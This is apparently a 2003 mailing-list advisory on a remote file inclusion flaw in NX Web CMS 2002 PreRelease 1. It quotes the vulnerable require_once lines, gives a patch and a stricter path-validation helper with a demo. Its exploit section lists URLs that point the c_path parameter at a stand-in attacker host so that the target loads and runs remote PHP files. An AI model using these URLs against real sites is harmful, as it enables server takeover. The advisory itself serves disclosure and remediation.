Information :
°°°°°°°°°°°°°
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
nx/common/cds/menu.inc.php :
-----------------------------------------------------------
[...]
require_once $c_path."common/lib/launch.inc.php";
[...]
-----------------------------------------------------------

nx/common/dbo/datasets.php :
-----------------------------------------------------------
<?
require_once $c_path."common/dbo/saveset.php";
require_once $c_path."common/dbo/recordset.php";
require_once $c_path."common/dbo/deleteset.php";
require_once $c_path."common/dbo/updateset.php";
require_once $c_path."common/dbo/insertset.php";
[...]
-----------------------------------------------------------

nx/common/lib/mass_opeations.inc.php :
-----------------------------------------------------------
<?
require_once $c_path."common/lib/launch.inc.php";
require_once $c_path."common/cds/menu.inc.php";
[...]
-----------------------------------------------------------

etc...

Exploits :
°°°°°°°°°°
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/
with :
http://[attacker]/common/lib/launch.inc.php

http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php

etc...

Solution :
°°°°°°°°°°
Add this line to the affected files :
-----------------------------------------------------------------
if (!file_exists($c_path."index.php")){
    die("Path not found.");
}
-----------------------------------------------------------------

A patch can be found on http://www.phpsecure.org .
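
A stricter form of the check in the Solution, given here as an added example (it is not NX code and not the phpsecure.org patch): it accepts $c_path only when it carries no URL scheme and resolves to a local directory inside the application root. The function name nx_safe_base_path and the temporary directory layout are assumptions made for the demonstration.

```php
<?php
// Added example (hypothetical helper, not NX code and not the phpsecure.org patch).
// Accepts a base path only if it resolves to a local directory inside $appRoot.
function nx_safe_base_path($candidate, $appRoot)
{
    // Stream wrappers and URLs (http://, ftp://, php://, ...) are never valid here.
    if (!is_string($candidate) || $candidate === '' || strpos($candidate, '://') !== false) {
        return false;
    }
    $root = realpath($appRoot);      // canonical application root
    $real = realpath($candidate);    // false if the path does not exist locally
    if ($root === false || $real === false || !is_dir($real)) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $real = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Prefix comparison on canonical paths stops "../" from leaving the root.
    return strncmp($real, $root, strlen($root)) === 0 ? $real : false;
}

// Constructed sample layout mirroring the paths named in the advisory.
$appRoot = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'nx_demo_' . getmypid();
mkdir($appRoot . '/common/lib', 0700, true);
file_put_contents($appRoot . '/common/lib/launch.inc.php', "<?php // stub\n");

$candidates = array(
    $appRoot . '/',          // legitimate local base path
    'http://[attacker]/',    // remote base path, as in the advisory's URLs
    $appRoot . '/../',       // climbs out of the application root
    '',                      // variable never initialised
);
foreach ($candidates as $c) {
    $ok = nx_safe_base_path($c, $appRoot);
    printf("%-45s => %s\n", var_export($c, true), $ok === false ? 'rejected' : 'accepted');
    if ($ok !== false) {
        // Only a validated, canonical local path ever reaches require_once.
        require_once $ok . 'common/lib/launch.inc.php';
    }
}

// Clean up the constructed tree.
unlink($appRoot . '/common/lib/launch.inc.php');
rmdir($appRoot . '/common/lib');
rmdir($appRoot . '/common');
rmdir($appRoot);
```

In the affected files the safer option is to stop reading the base path from the request at all and set $c_path from a fixed server-side value before the first require_once.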

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NX.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n

This archive was generated by hypermail 2b30 : Thu Jan 02 2003 - 18:51:27 PST